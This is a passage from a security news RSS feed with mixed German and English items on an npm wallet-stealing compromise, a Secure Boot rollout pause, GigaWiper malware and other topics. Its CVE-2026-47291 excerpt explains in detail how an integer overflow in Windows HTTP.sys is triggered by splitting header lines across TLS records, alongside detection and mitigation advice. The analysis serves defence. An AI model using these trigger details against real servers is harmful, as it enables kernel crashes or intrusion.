The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded wi...]]></description>
<link>https://tsecurity.de/de/3660512/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660512/it-security-nachrichten/injective-labs-github-compromise-pushes-wallet-key-stealing-npm-packages/</guid>
<pubDate>Fri, 10 Jul 2026 19:41:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unknown threat actors compromised the Injective Labs SDK project's GitHub repository and leveraged it to publish a malicious package on the npm registry to steal cryptocurrency wallet private keys and mnemonic seed phrases.

The compromised version, @injectivelabs/sdk-ts@1.20.21, came embedded with fake telemetry functionality that exfiltrated data from cryptocurrency wallets. The version was]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft bestätigt Probleme mit Secure-Boot-Update auf bestimmten PCs und stoppt Rollout]]></title>
<description><![CDATA[Am 24. Juni liefen einige ältere Microsoft-Zertifikate ab, was bedeutet, dass viele Nutzer von Windows 10 und 11 ihre Computer aktualisieren müssen. Ansonsten kann der sichere Systemstart nicht mehr gewährleistet werden.



Nun steht jedoch fest, dass Microsoft die Bereitstellung neuer Zertifikat...]]></description>
<link>https://tsecurity.de/de/3660141/it-nachrichten/microsoft-bestaetigt-probleme-mit-secure-boot-update-auf-bestimmten-pcs-und-stoppt-rollout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660141/it-nachrichten/microsoft-bestaetigt-probleme-mit-secure-boot-update-auf-bestimmten-pcs-und-stoppt-rollout/</guid>
<pubDate>Fri, 10 Jul 2026 17:02:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.pcwelt.de/article/3173369/stichtag-fur-secure-boot-ab-morgen-muessen-sie-diese-neuen-windows-zertifikate-besitzen.html" target="_blank" rel="noreferrer noopener">Am 24. Juni</a> liefen einige ältere Microsoft-Zertifikate ab, was bedeutet, dass viele Nutzer von Windows 10 und 11 ihre Computer aktualisieren müssen. Ansonsten kann der sichere Systemstart nicht mehr gewährleistet werden.</p>



<p>Nun steht jedoch fest, dass Microsoft die Bereitstellung neuer Zertifikate für bestimmte Computer, darunter eine Reihe von HP-Modellen, vorübergehend ausgesetzt hat. So erklärt es das Unternehmen in einem <a href="https://support.microsoft.com/en-us/topic/if-you-re-prevented-from-updating-secure-boot-certificates-e01cc486-8721-457f-9bc7-5cb801c1759e#wl" target="_blank" rel="noreferrer noopener">Support-Dokument:</a></p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Auf den allermeisten PCs wird der vollständige Satz an Secure-Boot-Zertifikaten automatisch über Windows Update installiert. Bei einigen Geräten ist ein Firmware-Update des PC-Herstellers erforderlich, bevor Sie die notwendigen Secure-Boot-Updates installieren können. Viele OEMs stellen diese Firmware-Updates aktiv über ihre üblichen Update-Kanäle zur Verfügung. Falls ein Firmware-Update erforderlich ist, informieren Sie sich auf der Secure-Boot-Supportseite Ihres OEMs über die nächsten Schritte.</p>



<p>In einigen Fällen zeigt „Windows-Sicherheit“ möglicherweise an, dass die Updates für Secure-Boot-Zertifikate vorübergehend angehalten oder blockiert sind, indem eine der folgenden Meldungen angezeigt wird:</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img decoding="async" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_883ec5.png" alt="" class="wp-image-3188888" loading="lazy"></figure></div>



<p><br></p>
</blockquote>



<p>Bis HP und andere betroffene Computerhersteller neue Firmware bereitgestellt haben, wird es daher nicht möglich sein, die betreffenden Zertifikate zu aktualisieren, berichtet die Seite <a href="https://www.windowslatest.com/2026/07/10/microsoft-confirms-secure-boot-update-failing-on-some-windows-11-pcs-promises-a-resolution/" data-type="link" data-id="https://www.windowslatest.com/2026/07/10/microsoft-confirms-secure-boot-update-failing-on-some-windows-11-pcs-promises-a-resolution/">Windows Latest</a>.</p>



<p>Das Risiko, aufgrund veralteter Zertifikate in Schwierigkeiten zu geraten, ist derzeit gering, dürfte jedoch mit der Zeit zunehmen. Siehe <a href="https://www.pcwelt.de/article/3147966/das-passiert-mit-ihrem-windows-ab-juni-2026-wenn-sie-die-secure-boot-deadline-ignorieren.html" target="_blank" rel="noreferrer noopener">Das passiert mit Ihrem Windows ab Juni, wenn Sie die Secure-Boot-Deadline übersehen</a>.</p>



<p>Wenn Sie von diesem Problem betroffen sind, bleibt Ihnen allerdings nichts anderes übrig, als auf eine Lösung seitens Microsoft und HP zu warten. Erzwingen können Sie das Secure-Boot-Update jedenfalls nicht (<a href="https://www.pcwelt.de/article/3174269/secure-boot-update-fuer-ihren-windows-11-und-10-pc-das-muessen-sie-heute-wissen.html" target="_blank" rel="noreferrer noopener">die Rede ist von diesem Update hier</a>).</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-2978563-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p><strong>Mehr zum Thema Secure Boot:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3174269/secure-boot-update-fuer-ihren-windows-11-und-10-pc-das-muessen-sie-heute-wissen.html" target="_blank" rel="noreferrer noopener">Secure-Boot-Update für Ihren Windows 11 und 10 PC: Das müssen Sie heute wissen</a></li>



<li><a href="https://www.pcwelt.de/article/3033338/wichtige-windows-11-zertifikate-laufen-ab-so-pruefen-sie-secure-boot.html" target="_blank" rel="noreferrer noopener">Wichtige Windows-11-Zertifikate laufen ab – So prüfen Sie, ob Sie betroffen sind</a></li>



<li><a href="https://www.pcwelt.de/article/3183006/ihr-windows-pc-ist-in-gefahr-wenn-ihnen-diese-sicherheitszertifikate-fehlen-loesung.html" target="_blank" rel="noreferrer noopener">Ihr Windows-PC ist in Gefahr, wenn Ihnen diese Sicherheitszertifikate fehlen: So lösen Sie das Problem</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47291: Remote Code Execution in the Windows HTTP.sys]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service co...]]></description>
<link>https://tsecurity.de/de/3659964/it-security-nachrichten/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659964/it-security-nachrichten/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</guid>
<pubDate>Fri, 10 Jul 2026 16:08:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges. The following is a portion of their write-up covering CVE-2026-47291, with a few minimal modifications.</em></p>





















  
  



<hr>



  <p class="">A remote code execution vulnerability exists in the HTTP Protocol Stack for Microsoft Internet Information Services implemented in HTTP.sys. The vulnerability is due to invalid validating incoming HTTP requests. </p><p class="">A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP packets to the target system. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges.</p><p class=""><strong>The Vulnerability</strong></p><p class=""><em>HTTP.sys</em> is the kernel-mode HTTP protocol driver in Microsoft Windows. It provides HTTP request parsing, response caching, and SSL/TLS termination for Internet Information Services (IIS) and other applications that register URL prefixes. The driver listens on configured TCP ports (commonly 80 for HTTP and 443 for HTTPS) and processes inbound HTTP/1.x and HTTP/2 requests at the kernel level.</p><p class="">When operating over HTTPS, <em>HTTP.sys</em> delegates TLS processing to the Windows Secure Channel (SChannel) provider. Inbound TCP data is decrypted on a <a href="https://www.rfc-editor.org/info/rfc8446/">per-record basis</a>: each TLS record constitutes an independent unit of encryption and is decrypted separately by SChannel before being delivered to <em>HTTP.sys</em> as a distinct plaintext buffer. A single TLS 1.3 application data record has the following structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






  <p class="">The decrypted payload of each TLS record is delivered independently to the HTTP parser via</p><p class=""><em>UlHttpBufferReceiveEvent()</em>, regardless of how many TLS records the underlying TCP connection coalesces into a single TCP segment. This behavior is distinct from plaintext HTTP connections, where the Windows TCP stack coalesces multiple segments into a single receive indication before the data reaches <em>HTTP.sys</em>.</p><p class="">The HTTP parser maintains a per-request state object that includes a dynamically grown buffer reference array. The <em>capacity</em> field stores the current number of allocated slots in the buffer reference array. The <em>count</em> field stores the number of slots currently in use. The <em>ref_array_ptr</em> field points to the dynamically allocated array of 8-byte buffer reference entries.</p><p class="">An integer overflow vulnerability exists in <em>HTTP.sys</em>. The vulnerability is due to insufficient bounds checking when growing a buffer reference array during HTTP/1.x header parsing. When <em>HTTP.sys</em> receives data for an HTTP/1.x request, it allocates a <em>UL_REQUEST_BUFFER</em> structure for each receive indication and tracks these buffers in the per-request reference array described above. The <em>count</em> field records the number of active buffer references, and the <em>capacity</em> field records the total number of allocated slots. </p><p class="">As the HTTP parser (<em>UlpParseNextRequest()</em>) processes header lines, it calls an inline buffer reference routine each time a new receive buffer is consumed. When <em>count</em> reaches <em>capacity</em>, the routine grows the array by reallocating it with five additional slots. The new allocation size is computed as 0x28 + <em>capacity</em> * 8, the contents of the existing array are copied via <em>memmove</em> using <em>count</em> * 8 as the copy length, and <em>capacity</em> is incremented by 5 as a 16-bit unsigned integer addition. No overflow check is performed on this addition.</p><p class="">After 13,107 growth events, <em>capacity</em> reaches 0xFFFB. The next growth adds 5, producing 0x10000, which truncates to 0x0000 in the 16-bit field. On the subsequent buffer reference addition, <em>count</em> (which is now 65,536 or greater) exceeds the zero <em>capacity</em>, triggering another growth. The allocation size computation 0x28 + 0 * 8 produces a 40-byte allocation, but the <em>memmove</em> copies <em>count</em> * 8 bytes (approximately 524,256 bytes) from the old buffer into the 40-byte allocation. This results in a kernel pool heap buffer overflow of over 500 kilobytes.</p><p class="">Each buffer reference corresponds to one receive buffer delivered to the HTTP parser. For plaintext HTTP connections, the Windows TCP stack coalesces received segments into large indications, and <em>UlpMergeBuffers() </em>further combines buffers within <em>HTTP.sys</em>. Over TLS connections, each TLS record is decrypted independently by SChannel and delivered as a separate buffer through <em>UlHttpBufferReceiveEvent()</em> into <em>UlpCopyIndicatedData()</em>. If each TLS record contains exactly one complete header line (terminated by CRLF), the HTTP parser fully consumes the buffer without setting the partial-parse flag, causing <em>UlpAdjustBuffers()</em> to advance to the next buffer via its non-merge path. This creates a 1:1 correspondence between TLS records sent and buffer references accumulated.</p><p class="">To trigger the overflow, an attacker crafts an HTTP request in which each header line is encapsulated in a separate TLS application data record. Given a minimum header line size of approximately 4 bytes and a required count of 65,536 buffer references, the total request size comes to roughly 262,144 bytes. The <em>MaxRequestBytes </em>registry value (at <em>HKLM\SYSTEM\CurrentControlSet\Services\HTTP\Parameters</em>) must be configured to a value of at least 262,144 bytes for the server to accept a request of this size. The default value of 16,384 bytes limits the request to approximately 4000 header lines, which is insufficient to trigger the overflow. As a mitigation, keeping <em>MaxRequestBytes</em> at or below 65,535 bytes represents the most conservative configuration to prevent this attack.</p><p class="">A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP/1.x request over a TLS connection to an affected server. Successful exploitation results in unexpected system termination due to a memory access exception in the context of the kernel. Under specific memory layout conditions, exploitation could result in arbitrary code execution in the context of the kernel.</p><p class=""><strong>Notes:</strong></p><p class="">• The vulnerability is only reachable through HTTP/1.x header parsing over TLS connections. HTTP/2 and HTTP/3 use different parser paths that do not interact with the buffer reference array.</p><p class="">• Body data parsing (Content-Length or chunked transfer encoding) does not add entries to the buffer reference array. Only header parsing triggers buffer reference growth.</p><p class="">• At a sending rate of 10 milliseconds per TLS record, the overflow requires approximately 11 minutes to trigger.</p><p class=""><strong>Source Code Walkthrough</strong></p><p class="">The following code snippet was taken from <em>HTTP.sys</em> version 10.0.26100.7705. Comments added by TrendAI Research have been highlighted.</p><p class="">In <em>UlpParseNextRequest()</em>:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






  <p class=""><strong>Detection Guidance</strong></p><p class="">To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the TCP port 443.</p><p class="">The traffic on the affected port(s) is TLS-encrypted. The detection device must be able to decrypt the TLS traffic before applying the following detection method. The detection device should monitor for HTTPS connections.</p><p class="">An HTTP/1.x request [1] consists of a request line followed by zero or more header field lines, each terminated by CRLF. The following grammar defines the relevant structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  






  <p class=""><em>Decrypted traffic inspection:</em></p><p class="">After decrypting the TLS session, the detection device must parse the HTTP/1.x request headers. The detection device must count the number of distinct header field lines present in a single HTTP request. If the number of header field lines in a single request exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Encrypted traffic heuristics:</em></p><p class="">Where decryption is not available, the detection device should inspect the pattern of TLS application data records within the encrypted session. If each TLS application data record contains a single short payload and the total number of such records on a single connection exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Notes:</em></p><p class="">• The preferred detection method (header line count) requires the ability to decrypt TLS traffic, for example through TLS inspection, a decrypting proxy, or possession of the server's private key. This method directly observes the attack indicator and produces low false-positive and false-negative rates.</p><p class="">• The TLS record heuristic operates on encrypted traffic and does not require decryption. This method is more prone to false positives (legitimate applications that send many small TLS records, such as interactive streaming sessions, may trigger the heuristic) and to false negatives (the threshold is based on observable record sizes rather than the actual header count that determines exploitability). Where possible, decrypted traffic inspection should be preferred.</p><p class="">• The attack requires approximately 11 minutes of sustained connection to accumulate sufficient header lines. Connection duration monitoring may serve as a supplementary detection heuristic.</p><p class=""><strong>Conclusion</strong></p><p class="">This vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291">patched</a> by Microsoft in the June 2026 release cycle. They note several mitigations that include editing the registry to ensure unpatched systems are not vulnerable to exploitation. However, the best method to ensure this bug has been fully remediated is to test and deploy the vendor-supplied patch.</p><p class="">Special thanks to Yazhi Wang and Jonathan Lein of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[„Super Sensing“: Meta testet offenbar ständig aufnehmende KI-Brillen]]></title>
<description><![CDATA[Meta hat gerade erst betont, seine KI-Brillen besser gegen heimliche Aufnahmen absichern zu wollen. Nun folgt der passende Kontrast dazu: Der Konzern arbeitet offenbar an „Super Sensing“-Funktionen, bei denen smarte Brillen dauerhaft Ton erfassen und alle paar Sekunden Fotos aufnehmen könnten. Au...]]></description>
<link>https://tsecurity.de/de/3659862/ios-mac-os/super-sensing-meta-testet-offenbar-staendig-aufnehmende-ki-brillen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659862/ios-mac-os/super-sensing-meta-testet-offenbar-staendig-aufnehmende-ki-brillen/</guid>
<pubDate>Fri, 10 Jul 2026 15:25:42 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/super-sensing-meta-testet-offenbar-staendig-aufnehmende-ki-brillen-283339/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2024/09/meta-orion-feature-150x150.jpg" class="alignright tfe wp-post-image" alt="Meta Orion Feature" decoding="async"></a><p>Meta hat gerade erst betont, seine KI-Brillen besser gegen heimliche Aufnahmen absichern zu wollen. Nun folgt der passende Kontrast dazu: Der Konzern arbeitet offenbar an „Super Sensing“-Funktionen, bei denen smarte Brillen dauerhaft Ton erfassen und alle paar Sekunden Fotos aufnehmen könnten. Auf einer Seite ist die Kamera im Rahmen integriert. Laut einem Bericht der Financial […]</p>
<p>The post <a href="https://www.ifun.de/super-sensing-meta-testet-offenbar-staendig-aufnehmende-ki-brillen-283339/">„Super Sensing“: Meta testet offenbar ständig aufnehmende KI-Brillen</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Diese neuen Funktionen bekommen Android-Nutzer im Juli]]></title>
<description><![CDATA[Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr Smartphone haben (unabhängig vom Hersteller).



Die Seite 9to5Google hat die wichtigsten Neuerungen zusammengefasst. Demnach bek...]]></description>
<link>https://tsecurity.de/de/3659687/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659687/it-nachrichten/diese-neuen-funktionen-bekommen-android-nutzer-im-juli/</guid>
<pubDate>Fri, 10 Jul 2026 14:33:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google ist aktuell dabei, ein neues Google-Play-System-Update auszurollen. Damit erhalten Android-Nutzer monatlich neue Funktionen, die einen direkten Einfluss auf ihr <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">Smartphone </a>haben (unabhängig vom Hersteller).</p>



<p>Die Seite <a href="https://9to5google.com/2026/07/09/android-documents-backup/" target="_blank" rel="noreferrer noopener">9to5Google</a> hat die wichtigsten Neuerungen zusammengefasst. Demnach bekommen Android-Nutzer die Option, die Sicherung von SMS-, MMS- und RCS-Nachrichten direkt zu steuern. Das ähnelt der <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">separaten Backup-Einstellung für ausgewählte Apps</a>, die wir Ihnen letzte Woche vorgestellt hatten.</p>



<p>Über <strong>Einstellungen &gt; Konten und Sicherung &gt; Google-Sicherung &gt; Weitere Gerätedaten</strong> gibt es nach Erhalt des Updates einen neuen Ein-/Aus-Schalter für SMS- und MMS-Nachrichten, Anrufverlauf und Geräteeinstellungen. Sie haben also deutlich mehr Kontrolle darüber, welche Daten Sie über die Google-Cloud speichern wollen.</p>



<p>Das ist auch besonders wichtig, da Google seit Neuestem <a href="https://www.pcwelt.de/article/3185747/google-erlaubt-android-nutzern-ab-sofort-kein-kostenloses-backup-mehr-speicherplatz-angererechnet.html" target="_blank" rel="noreferrer noopener">keine Gratis-Backups für Android-Geräte mehr erlaubt</a>. Jedes Backup Ihres Smartphones zählt also direkt auf Ihr verfügbares Speicherkontingent ein, das in der Gratis-Variante gerade einmal 15 GB sind.</p>



<p>Zusätzlich führt Android nun die lokale Sicherung von Dokumenten ein. Damit können Sie Ihre heruntergeladenen Dokumente automatisch in Google Drive speichern, damit diese sicher und von jedem Ihrer Geräte aus zugänglich sind. Auf der Seite „Sicherung“ erscheint dann neben „Fotos &amp; Videos“ und „Sonstige Gerätedaten“ ein neues Menü namens „Dokumente“.</p>



<p>Google erklärt, dass zu den unterstützten Dateiformaten .DOC, .PPT, .XLS, .PDF “und alle anderen auf diesem Gerät gespeicherten Dokumente” gehören. Dokumente sollen bei der Übertragung zwischen Ihrem Gerät und den Google-Diensten verschlüsselt werden. Änderungen, die an den Dokumenten an einem Ort vorgenommen werden, werden nicht mit anderen Orten synchronisiert.</p>



<h3 class="wp-block-heading">Mehr Neuerungen</h3>



<p>In den <a href="https://support.google.com/product-documentation/answer/14343500?hl=de" target="_blank" rel="noreferrer noopener">Versionshinweisen zu den Google-Systemdiensten</a> finden sich noch mehr kleine Neuerungen, die jetzt an Android-Nutzer ausgerollt werden. Dazu gehören unter anderem die Überarbeitung von In-App-Käufen mithilfe einer “verbesserten, nativen Storefront für Google One”, die Übertragung von Arbeitsprofilen auf Wear-OS-Smartwatches, eine neue Google-Standortfreigabe für Chromebooks sowie „neue Funktionen für Entwickler von Google- und Drittanbieter-Apps zur Unterstützung von Prozessen in ihren Apps im Zusammenhang mit Google Maps”.</p>



<p>All diese neuen Funktionen werden seit dem 6. Juli an Android-Nutzer verteilt. Über <strong>Einstellungen</strong> <strong>&gt;</strong> <strong>Sicherheit und Datenschutz</strong> <strong>&gt;</strong> <strong>Updates</strong> <strong>&gt;</strong> <strong>Google Play-Systemupdate</strong> können Sie die aktuell installierte Version der Google Play System Updates prüfen und gegebenenfalls auf eine neue Version aktualisieren.</p>



<p><a href="https://www.pcwelt.de/article/3092158/android-17-diese-smartphones-bekommen-das-update-komplette-geraeteliste.html" target="_blank" rel="noreferrer noopener">Android 17: Diese Smartphones bekommen das Update</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform]]></title>
<description><![CDATA[London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that co...]]></description>
<link>https://tsecurity.de/de/3659568/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659568/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</guid>
<pubDate>Fri, 10 Jul 2026 13:38:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built […]</p>
<p>The post <a href="https://gbhackers.com/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/">FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform]]></title>
<description><![CDATA[London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that co...]]></description>
<link>https://tsecurity.de/de/3659566/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659566/it-security-nachrichten/fastnetmon-launches-netomics-a-self-hosted-routing-intelligence-platform/</guid>
<pubDate>Fri, 10 Jul 2026 13:38:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>London, United Kingdom, July 10th, 2026, CyberNewswire New platform gives network operators complete visibility into Internet routing while keeping all routing intelligence inside their own infrastructure. FastNetMon is introducing Netomics, a self-hosted BGP routing intelligence platform that combines live routing data, registry information, RPKI validation, routing history and AI-assisted querying into a single application. Built […]</p>
<p>The post <a href="https://cybersecuritynews.com/fastnetmon-launches-netomics-routing-intelligence-platform/">FastNetMon Launches Netomics, a Self-Hosted Routing Intelligence Platform</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft uncovers GigaWiper, a backdoor designed for destruction on demand]]></title>
<description><![CDATA[Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.



In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote a...]]></description>
<link>https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659201/it-security-nachrichten/microsoft-uncovers-gigawiper-a-backdoor-designed-for-destruction-on-demand/</guid>
<pubDate>Fri, 10 Jul 2026 11:07:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft is warning defenders about a new backdoor that blurs the line between espionage malware and wipers.</p>



<p>In a technical analysis published on Thursday, Microsoft Threat Intelligence detailed GigaWiper, a Golang-based implant first observed in October 2025 intrusions that combines remote administration capabilities with multiple disk-wiping and ransomware routines.</p>



<p>Rather than building a new destructive tool from scratch, the operators assembled GigaWiper from several existing malware families, embedding them as modular commands inside a single backdoor.</p>



<p>“GigaWiper is particularly notable for its makeup,” Microsoft researchers <a href="https://www.microsoft.com/en-us/security/blog/2026/07/09/gigawiper-anatomy-of-a-destructive-backdoor-assembled-from-multiple-malware/" target="_blank" rel="noreferrer noopener">said</a>. “The consolidation of multiple destructive capabilities into a modular backdoor reflects a notable shift in wiper malware, which are typically designed purely to destroy rather than to extort and carry real-world consequences.”</p>



<p>Malware capabilities of the backdoor included multiple disk wiping logics, an irreversible Crucio ransomware encryption, persistence, and RabbitMQ and Redis-based communication.</p>



<h2 class="wp-block-heading"><a></a>A backdoor for destruction on demand</h2>



<p>According to Microsoft, GigaWiper exists in two forms. A standalone wiper and a larger backdoor whose command set embeds the standalone wiping functionality alongside numerous administrative features.</p>



<p>Written in Go, the malware supports 20 command codes that enable operators to execute <a href="https://www.csoonline.com/article/4006326/how-to-log-and-monitor-powershell-activity-for-suspicious-scripts-and-commands.html">PowerShell </a>commands, manage Windows services and processes, manipulate the registry, capture screenshots, record displays, clear event logs, and remotely control infected systems through a Virtual Network Computing (<a href="https://www.csoonline.com/article/573427/exposed-vnc-threatens-critical-infrastructure-as-attacks-spike.html">VNC</a>)-like capability.</p>



<p>Persistence is established through a scheduled task posing as a “OneDrive Update,” while command-and-control (C2) relies on <a href="https://www.csoonline.com/article/572033/fbis-warning-about-iranian-firm-highlights-common-cyberattack-tactics.html?utm=hybrid_search#:~:text=RabbitMQ%20service%20on%20SolarWinds">RabbitMQ</a> for receiving instructions and <a href="https://www.csoonline.com/article/1308535/new-redis-attack-campaign-weakens-systems-before-deploying-cryptominer.html">Redis </a>for returning command output. This architecture allows attackers to quietly maintain access and selectively activate destructive functionality when an objective has been achieved, the researchers added.</p>



<h2 class="wp-block-heading"><a></a>The backdoor combines three malware families</h2>



<p>Microsoft researchers found that GigaWiper integrates destructive code from multiple malware families instead of relying on a single wiping mechanism.</p>



<p>These integrations show up in the form of separate commands that the backdoor supports.<br><br>One command performs raw physical disk wiping by overwriting drives and removing partition metadata. Another borrows from the Crucio ransomware family, encrypting files with randomly generated keys that are intentionally never stored, making recovery impossible despite presenting itself like ransomware.</p>



<p>A third command recreates the functionality of FlockWiper, implementing secure multi-pass wiping in Go to permanently erase data on Windows systems.</p>



<p>“We tied GigaWiper to both Crucio and FlockWiper based on code analysis, shared execution flow, function naming, and unique strings,” the researchers said. “Crucio’s code was the base for GigaWiper command 3, and FlockWiper was re-coded in Golang and updated for GigaWiper command 12,” they noted, referring to the 20 listed commands the backdoor supports.</p>



<p>The standalone wiper was implemented as command 1 from the list.</p>



<p>Microsoft recommended hardening endpoints and identities, enabling behavioral detection and endpoint detection and response (EDR) capabilities, and using attack surface reduction controls to limit compromise risks. </p>



<p>The company also urged defenders to maintain offline or otherwise resilient backups, as destructive malware like GigaWiper is designed to irreversibly wipe or encrypt data. To support detection, the researchers shared a list of indicators of compromise (IOCs), which included FlockWiper and Crucio file hashes and a couple of C2 IP addresses.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Most data brokers won’t tell you what happened to your deletion request]]></title>
<description><![CDATA[Data brokers collect personal details on most adults in the United States and sell them to buyers that include employers, landlords, insurance companies, and government agencies. California gives residents a way to push back. You can ask a broker to delete your records, or to stop selling and sha...]]></description>
<link>https://tsecurity.de/de/3658931/it-security-nachrichten/most-data-brokers-wont-tell-you-what-happened-to-your-deletion-request/</link>
